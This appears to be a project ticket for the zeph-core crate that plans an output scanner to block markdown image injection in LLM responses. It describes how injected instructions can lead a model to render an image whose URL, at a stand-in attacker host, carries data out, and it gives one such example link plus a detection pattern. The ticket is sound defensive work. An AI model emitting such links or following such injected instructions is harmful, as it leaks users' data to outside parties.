Part of #1195 — Phase 4

Block markdown image injection in LLM output — a known exfiltration vector where injected instructions trick the model into rendering ![](https://attacker.com/steal?data=...).

Crates: zeph-core
Depends on: SEC-1.1

Tasks:

• Output scanner: detect ![...](http...) patterns in LLM response
• Strip or replace with [blocked external image: ...] when URL is not in user's original message
• Allowlist for known safe domains (configurable)
• Config: [security.exfiltration_guard] block_markdown_images = true
• Unit tests with various markdown image injection variants

Files: crates/zeph-core/src/sanitizer/exfiltration.rs (new)